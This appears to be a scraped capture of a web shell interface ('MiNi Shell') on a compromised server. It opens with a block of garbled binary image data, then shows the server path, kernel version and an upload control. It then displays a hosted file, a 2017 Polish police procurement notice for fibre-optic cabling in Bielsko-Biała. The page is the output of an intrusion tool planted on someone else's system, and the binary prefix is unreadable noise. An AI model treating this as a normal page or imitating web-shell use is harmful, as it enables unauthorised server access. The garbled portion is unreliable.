JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171004/594275-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 594275-N-2017 z dnia 2017-10-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Komenda Wojewódzka Policji w Katowicach</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">ZP-2380-385-86/2017 Przygotowanie infrastruktury teletechnicznej w celu przeniesienia usług realizowanych po kablach telekomunikacyjnych Policji z aktualnej siedziby KMP Bielsko Biała przy ul. Rychlińskiego do nowo budowanego obiektu KMP w Bielsku Białej przy ul. Wapiennej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy">PRAWIDŁOWY E-MAIL ZAMAWIAJĄCEGO TO - zamowienia@ka.policja.gov.pl</span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Komenda Wojewódzka Policji w Katowicach</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27020829200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. J. Lompy</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">19</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">40038 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Katowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 002 050</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@slaska.policja.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">322 002 060</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.katowice.kwp.policja.gov.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.katowice.kwp.policja.gov.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23.11.2012r. Prawo Pocztowe, osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Komenda Wojewódzka Policji w Katowicach, ul. Lompy 19, 40-038 Katowice, Zespół zamówień publicznych, Sekretariat blok A, parter</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">ZP-2380-385-86/2017 Przygotowanie infrastruktury teletechnicznej w celu przeniesienia usług realizowanych po kablach telekomunikacyjnych Policji z aktualnej siedziby KMP Bielsko Biała przy ul. Rychlińskiego do nowo budowanego obiektu KMP w Bielsku Białej przy ul. Wapiennej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP-2380-385-86/2017 </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest: wykonawca przygotuje projekt wykonawczy zgodnie z warunkami wydanymi przez Urząd Miasta w Bielsku Białej (warunki w załączeniu) który musi zostać zatwierdzony przez Wydział Informatyki Urzędu Miasta oraz WTI KWP w Katowicach (w 4 egzemplarzach). Od strony nowej lokalizacji Komendy Miejskiej Policji w Bielsku Białej Wykonawca zobowiązany będzie do wykonania projektu nawiązania pomiędzy studnią kablową sieci teletechnicznej UM a studnią kablową sieci teletechnicznej Policji, wykonanie tego nawiązania rurą o średnicy min. 40mm np. HDPE40 oraz jego zainwentaryzowania. Od strony ul. Rychlińskiego Wykonawca wykona nawiązanie pomiędzy studnią kablową UM w Bielsku Białej a sąsiadującą z nią studnią Orange Polska rurą HDPE40.Po uzyskaniu akceptacji projektów wykonawca zakupi i ułoży w mikrokanalizacji kablowej kabel światłowodowy typu A-DQ2Y 36J lub Z-(XX)OTKtsdD 36J przeznaczony do układania w mikrokanalizacji. Po stronie nowej siedziby KMP przy ul. Wapiennej kabel należy zakończyć w serwerowni na przełącznicy optycznej ze złączami SC/APC (od ostatniej studni OPL do serwerowni jest około 200m drogi kablowej w kanalizacji Policji oraz szachtach kablowych). W kablowni należy zamontować stelaż zapasu kabla i zabezpieczyć na nim nie mniej niż 20 m kabla. Od strony ul. Rychlińskiego kabel zakończyć w studni kablowej UM mufą kablową uzbrojoną (tacki spawów) umożliwiającą wyspawanie min 72 włókien. Mufa powinna być przymocowana na stałe wraz ze stelażem zapasu kabla na którym należy zabezpieczyć min. 20 m zapasu tego kabla.	Po zakończeniu prac montażowych Wykonawca wykona pełne pomiary transmisyjne dla światłowodu po stronie nowej siedziby KMP natomiast od strony zakończenia w studni kablowej pomiary należy wykonać dla min. jednego włókna w każdej tubie.	W kosztach realizacji zadania Wykonawca zobowiązany jest uwzględnić koszty związane z realizacją prac w kanalizacji kablowej. Koszty dzierżawy kanalizacji pokryje Zamawiający.2. Zamawiający wymaga udzielenia gwarancji na okres 36 miesięcy od dnia podpisania protokołu odbioru, w zakresie zadań dotyczących sprzedaży włókien światłowodowych.3. Zamawiający wymaga, aby przedmiot zamówienia (w przypadku składania oferty na zadanie/zadania dotyczące ułożenia kabli światłowodowych) był fabrycznie nowy, wolny od wad technicznych i prawnych, dopuszczony do obrotu oraz gatunku I-go.4. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 i 7 do ogłoszenia czy powierza podwykonawcy/com wykonanie zamówienia. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował przy jego/ich udziale.5. Na podstawie art. 29 ust. 3a. zamawiający wymaga zatrudnienia przez wykonawcę, podwykonawcę lub dalszego podwykonawcę osób wykonujących czynności związane z dokonaniem ułożeniem kabla światłowodowego wykonawca zobowiązany jest wykonać osobami zatrudnionymi na podstawie umowy o pracę, lub pracę tymczasową. W związku z powyższym wykonawca oświadcza, że osoby wykonujące czynność polegającą na ułożeniem kabla światłowodowego wykonują pracownicy zatrudnieni na podstawie umowy o pracę, lub pracę tymczasową zgodnie z Wykazem Osób Zatrudnionych. Wykonawca najpóźniej w terminie 5 dniu roboczych od dnia zawarcia umowy przekaże uprawnionemu pracownikowi zamawiającego z Wydziału Teleinformatyki KWP w Katowicach wykaz osób zatrudnionych. Brak przedłożenia niniejszej listy będzie miał prawo naliczyć karę umowną zgodnie z § 10 ust. 7 jak również wypowiedzieć umowę z winy wykonawcy.6. W przypadku stwierdzenia przez zamawiającego, że wykonawca wykonuje usługę z naruszeniem zapisów ustępu 5 zamawiający będzie miał prawo naliczyć karę umowną zgodnie z § 10 ust. 8.7. O każdej zmianie personalnej osób wymienionych w ust. 5 Wykonawca zobowiązany jest poinformować Zamawiającego. Wykonawca będzie mógł wprowadzić do realizacji zamówienia nowe osoby dopiero po dokonaniu zmiany u Zamawiającego.8. Zmiany, o których mowa w ust. 6 wymagają przedłożenia Zamawiającemu, oświadczenia wykonawcy, że wskazane osoby do wykonywania usługi są zatrudnione na podstawie umowy o pracę, lub pracę tymczasową oraz nowej listy.9. Zamawiającemu w każdym momencie realizacji umowy przysługuje prawo do skontrolowania spełniania wymagań przez wykonawcę w zakresie określonym ust. 5,6 i 7.UWAGA	Zamawiający wymaga oprócz pomiarów reflektometrycznych w 2, 3 i 4 oknie wykonania także pomiarów tłumienności wynikowej w 2, 3 i 4 oknie transmisyjnym (co 20nm) oraz pomiaru dyspersji (chromatycznej i fazowej). Wykonawca zobowiązany jest do wykonania pomiarów dyspersji dla min. 1 tuby w światłowodzie (tj. 12J) .	W kosztach realizacji zadania Wykonawca zobowiązany jest uwzględnić koszty związane z realizacją prac w kanalizacji kablowej. Koszty dzierżawy kanalizacji pokryje Zamawiający.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">32562200-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45314310-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2017-12-22</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zakończenia wszystkich prac związanych z realizacją umowy w tym odbioru nastąpi w terminie do 22.12.2017 roku. Z zastrzeżeniem że odbiór końcowy nie może odbyć się wcześniej niż 15.12.2017r</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI 